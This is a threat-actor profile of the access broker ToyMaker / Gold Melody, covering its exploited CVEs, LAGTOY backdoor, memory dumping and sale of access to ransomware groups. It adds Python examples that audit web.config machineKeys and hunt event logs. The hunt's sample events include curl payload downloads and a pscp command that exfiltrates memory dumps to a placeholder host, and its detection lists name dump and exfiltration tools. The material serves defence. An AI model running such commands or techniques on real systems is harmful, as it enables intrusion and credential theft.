ToyMaker
ToyMaker is a financially motivated initial access broker (IAB), also described by Cisco Talos as a financially motivated initial access group, active against vulnerable internet-facing systems. Known aliases include GoldMelody / GOLD MELODY, UNC961, Prophet Spider, and TGR-CRI-0045; Unit 42 attributed TGR-CRI-0045 to Gold Melody (aka UNC961, Prophet Spider) with medium confidence, and BlackBerry correlated Prophet Spider activity with exploitation of Log4j in VMware Horizon. According to reporting on Gold Melody / Prophet Spider, the group has been active since at least 2017.

ToyMaker has been observed exploiting known vulnerabilities in public-facing infrastructure: Oracle WebLogic Server flaws such as CVE-2020-14882 and CVE-2020-14750 and older WebLogic CVEs including CVE-2016-0545, SQL injection, vulnerable internet-facing servers, VMware Horizon systems exposed to Log4Shell-related vulnerabilities, and ASP.NET IIS servers through leaked Machine Keys and View State deserialization. Unit 42 reported that TGR-CRI-0045 targeted organizations in Europe and the United States across financial services, manufacturing, wholesale/retail, high technology, and transportation/logistics. Talos also noted ToyMaker targeting high-value organizations, including critical infrastructure.

Talos reported that in a 2023 critical infrastructure intrusion, ToyMaker exploited vulnerable internet-facing systems, conducted preliminary reconnaissance, created a fake local administrator account named support, enabled or used Windows OpenSSH components, executed Magnet RAM Capture to dump memory, archived the dumps with 7za.exe, exfiltrated them with pscp.exe, and deployed the custom reverse-shell backdoor LAGTOY. Mandiant tracks the same backdoor family as HOLERUN. Talos observed that LAGTOY persisted as a Windows service named WmiPrvSV, communicated with a hard-coded C2 over TCP/443 using raw sockets rather than TLS, and included anti-debugging and time-based execution logic.
Talos assessed that ToyMaker harvested credentials from memory and later transferred access to Cactus, which used those credentials after roughly three weeks. ToyMaker has been observed handing off access to multiple ransomware groups: Talos stated that ToyMaker transferred access to Maze, Egregor, and Cactus, and reporting on Prophet Spider assessed that it likely functioned as an access broker and likely granted access to Egregor and MountLocker operators. Cisco Talos specifically described ToyMaker passing access to secondary threat actors, most notably the Cactus group.

Unit 42 reported that TGR-CRI-0045 used forged ASP.NET View State payloads signed with exposed Machine Keys to execute malicious .NET assemblies directly in memory via w3wp.exe, minimizing on-disk artifacts. Observed activity included use of C:\Windows\Temp\111t as a staging directory, retrieval of tooling via curl, reflective loading of .NET assemblies, reconnaissance commands, use of the custom privilege-escalation tool updf leveraging GodPotato to obtain SYSTEM, creation of local administrator accounts such as support:Sup0rt_1!admin, export of web.config files, and use of the Golang port scanner TxPortMap.

BlackBerry linked Prophet Spider to VMware Horizon Log4Shell exploitation, where ws_TomcatService.exe spawned cmd.exe or powershell.exe, often followed by encoded PowerShell download cradles. Observed post-exploitation included host and domain enumeration, dumping of the SAM, SYSTEM, and SECURITY hives, use of C:\Windows\Temp\7fde\ as a staging directory, downloading wget.bin and additional payloads, and in some cases deployment of cryptocurrency miners or Cobalt Strike. BlackBerry described Prophet Spider as an IAB known for selling access to ransomware operators.
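The Unit 42 activity above hinges on two facts: View State is only trusted because it carries a MAC under the site's machineKey, and the actor exported web.config files, which is where that key lives when it is set explicitly. A defender can audit for exactly that exposure. The following is an added example, not code from the Mallory profile, Unit 42, or Microsoft; the two web.config fragments and the "known leaked" key value are constructed for the demonstration, and the check reads only the standard system.web/machineKey and system.web/pages elements.

```python
"""Audit an ASP.NET web.config for machineKey settings that would let anyone
holding a leaked copy of the file sign (and therefore forge) View State.
Added example, not part of the Mallory profile or any vendor tooling; the
config fragments and the 'known leaked' key below are constructed."""
import xml.etree.ElementTree as ET

# Placeholder for a list of publicly disclosed keys loaded from a trusted
# source; the value here is invented for the demonstration only.
KNOWN_LEAKED_VALIDATION_KEYS = {"PLACEHOLDER-PUBLICLY-DISCLOSED-KEY"}


def audit_machine_key(config_xml):
    """Return a list of human-readable issues found in <system.web>."""
    root = ET.fromstring(config_xml)
    issues = []
    mk = root.find("./system.web/machineKey")
    if mk is not None:
        # ASP.NET's default for both keys is "AutoGenerate,IsolateApps",
        # which keeps the key material out of the file entirely.
        validation_key = mk.get("validationKey", "AutoGenerate")
        decryption_key = mk.get("decryptionKey", "AutoGenerate")
        if not validation_key.startswith("AutoGenerate"):
            issues.append("explicit validationKey: a leaked web.config lets "
                          "its holder sign arbitrary View State")
            if validation_key in KNOWN_LEAKED_VALIDATION_KEYS:
                issues.append("validationKey matches a publicly disclosed key; "
                              "rotate it immediately")
        if not decryption_key.startswith("AutoGenerate"):
            issues.append("explicit decryptionKey: a leaked file also exposes "
                          "encrypted View State and forms-auth tickets")
    pages = root.find("./system.web/pages")
    if pages is not None and pages.get("enableViewStateMac", "true").lower() == "false":
        # Newer .NET Framework builds ignore this switch and always validate,
        # but its presence still marks a configuration nobody has reviewed.
        issues.append("enableViewStateMac=false: View State accepted without a MAC check")
    return issues


# Constructed fragments, not taken from any real deployment.
RISKY_CONFIG = """<configuration>
  <system.web>
    <machineKey validationKey="PLACEHOLDER-PUBLICLY-DISCLOSED-KEY"
                decryptionKey="PLACEHOLDER-DECRYPTION-KEY"
                validation="HMACSHA256" decryption="AES" />
    <pages enableViewStateMac="false" />
  </system.web>
</configuration>"""

SAFER_CONFIG = """<configuration>
  <system.web>
    <machineKey validationKey="AutoGenerate,IsolateApps"
                decryptionKey="AutoGenerate,IsolateApps"
                validation="HMACSHA256" decryption="AES" />
  </system.web>
</configuration>"""

if __name__ == "__main__":
    for name, cfg in (("risky", RISKY_CONFIG), ("safer", SAFER_CONFIG)):
        print(name, audit_machine_key(cfg) or ["no issues"])
```

Explicit keys are legitimate in web farms, where every node must validate the same View State; the remediation there is not auto-generation but rotating the key after any suspected web.config exposure and keeping it out of the deployable file (for example via an external configSource), so that an exported web.config no longer carries signing material.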
The group’s tradecraft across reporting includes exploitation of internet-facing applications, credential harvesting, creation of unauthorized local accounts, reconnaissance, privilege escalation, persistence through services or scheduled tasks, in-memory execution, and transfer of access to downstream ransomware actors.
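Most of the artifacts in the three vendor accounts above (the WmiPrvSV service, the support account, the two Temp staging directories, web worker processes spawning shells or curl, and the dump/archive/transfer tooling) land in ordinary Windows telemetry. The following hunt is an added example, not code from the Mallory profile, Talos, Unit 42, or BlackBerry; the event records in SAMPLE_EVENTS are constructed, the field names follow the Windows System (7045), Security (4720) and Sysmon process-creation (1) event layouts as assumed here, and the image path for the rogue service is a placeholder because the reporting does not give one.

```python
"""Hunt exported Windows event records for the ToyMaker / Prophet Spider
artifacts named in the reporting above.  Added example, not vendor code;
SAMPLE_EVENTS is constructed, and field names follow the System, Security
and Sysmon event layouts as assumed here."""
from dataclasses import dataclass

# Artifacts quoted in the reporting, lower-cased for matching.
LAGTOY_SERVICE_NAMES = {"wmiprvsv"}   # the legitimate provider host is WmiPrvSE.exe, not a service
ROGUE_ACCOUNTS = {"support"}          # fake local administrator created by ToyMaker
STAGING_DIRS = (r"c:\windows\temp\111t", r"c:\windows\temp\7fde")
WEB_WORKERS = {"ws_tomcatservice.exe", "w3wp.exe"}   # VMware Horizon / IIS worker processes
SUSPICIOUS_CHILDREN = {"cmd.exe", "powershell.exe", "curl.exe"}
DUMP_AND_EXFIL_TOOLS = {"magnetramcapture.exe", "7za.exe", "pscp.exe", "txportmap.exe"}


@dataclass(frozen=True)
class Finding:
    rule: str
    record_id: int
    detail: str


def _basename(path):
    """Last path component, lower-cased, tolerant of either separator."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def hunt(events):
    """Return one Finding per artifact match; an event can yield several."""
    findings = []
    for ev in events:
        eid, rid = ev.get("EventID"), ev.get("RecordId")
        if eid == 7045:  # System log: a new service was installed
            if ev.get("ServiceName", "").lower() in LAGTOY_SERVICE_NAMES:
                findings.append(Finding("lagtoy_service_install", rid,
                                        f"{ev['ServiceName']} -> {ev.get('ImagePath')}"))
        elif eid == 4720:  # Security log: a user account was created
            if ev.get("TargetUserName", "").lower() in ROGUE_ACCOUNTS:
                findings.append(Finding("rogue_local_account", rid,
                                        f"{ev['TargetUserName']} created by {ev.get('SubjectUserName')}"))
        elif eid == 1:  # Sysmon: process creation
            image = _basename(ev.get("Image", ""))
            parent = _basename(ev.get("ParentImage", ""))
            cmdline = ev.get("CommandLine", "").lower()
            image_path = ev.get("Image", "").lower()
            if parent in WEB_WORKERS and image in SUSPICIOUS_CHILDREN:
                findings.append(Finding("web_worker_spawns_child", rid, f"{parent} -> {image}"))
            if any(d in cmdline or d in image_path for d in STAGING_DIRS):
                findings.append(Finding("known_staging_dir", rid, ev.get("CommandLine", "")))
            if image in DUMP_AND_EXFIL_TOOLS:
                findings.append(Finding("memory_dump_or_exfil_tool", rid, image))
    return findings


# Constructed records, not captured telemetry.  Hosts and URLs are placeholders.
SAMPLE_EVENTS = [
    {"RecordId": 1, "EventID": 7045, "ServiceName": "WmiPrvSV",
     "ImagePath": r"C:\PLACEHOLDER\lagtoy.exe"},  # path not given in reporting
    {"RecordId": 2, "EventID": 7045, "ServiceName": "Windows Update Medic Service",
     "ImagePath": r"C:\Windows\System32\svchost.exe -k WaaSMedicSvc"},
    {"RecordId": 3, "EventID": 4720, "TargetUserName": "support", "SubjectUserName": "WEBSRV01$"},
    {"RecordId": 4, "EventID": 1, "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Program Files\VMware\VMware View\Server\bin\ws_TomcatService.exe",
     "CommandLine": "cmd.exe /c whoami"},
    {"RecordId": 5, "EventID": 1, "Image": r"C:\Windows\System32\curl.exe",
     "ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "CommandLine": "curl.exe -o C:\\Windows\\Temp\\111t\\updf.exe [PLACEHOLDER-URL]"},
    {"RecordId": 6, "EventID": 1, "Image": r"C:\Windows\Temp\111t\updf.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe", "CommandLine": "updf.exe"},
    {"RecordId": 7, "EventID": 1, "Image": r"C:\Windows\Temp\111t\pscp.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "pscp.exe mem.7z [PLACEHOLDER-HOST]:"},
    {"RecordId": 8, "EventID": 1, "Image": r"C:\Windows\System32\svchost.exe",
     "ParentImage": r"C:\Windows\System32\services.exe", "CommandLine": "svchost.exe -k netsvcs"},
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"[{f.rule}] record {f.record_id}: {f.detail}")
```

Exact string matches on the account name and staging paths are the weakest rules here, since an operator changes them cheaply; the parent/child relationship (a Horizon or IIS worker process launching a shell or curl) and the dump-archive-transfer tool sequence are the signals worth alerting on and correlating by host and time window.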
Tradecraft
11 distinct techniques observed across reporting, grouped by tactic.
Associated malware families
5 malware families attributed to this actor across reporting.
Associated vulnerabilities
3 CVEs this actor has used in observed campaigns. 3 of them exploited in the wild.
Prophet Spider has also been seen using older Oracle CVEs such as CVE-2016-0545, as well as gaining initial access via SQL injection.
Researchers noticed a recent trend in which Prophet Spider uses CVE-2020-14882 and CVE-2020-14750 to get a foothold into target environments. Both CVEs relate to path traversal vulnerabilities that enable an attacker to access the WebLogic administrative console, which then allows for unauthenticated remote code execution.
Observables
16 indicators attributed to this actor: domains, IPs, hashes, and other artifacts pulled from reporting.
Recent activity
20 sources tracked across advisories, community write-ups, and news.
Initial access broker activity associated with creating unauthorized user accounts and modifying Winlogon registry keys to enable automatic login and support follow-on ransomware deployment.
Initial access broker activity: scans for vulnerable systems, deploys LAGTOY/HOLERUN, and sells access to ransomware operators (e.g., CACTUS) enabling double extortion.
Initial access broker providing access to secondary ransomware actors such as Cactus using a custom credential-stealing backdoor.
Gold Melody is an initial access broker that compromises ASP.NET sites using leaked machine keys and sells access to the underlying IIS servers.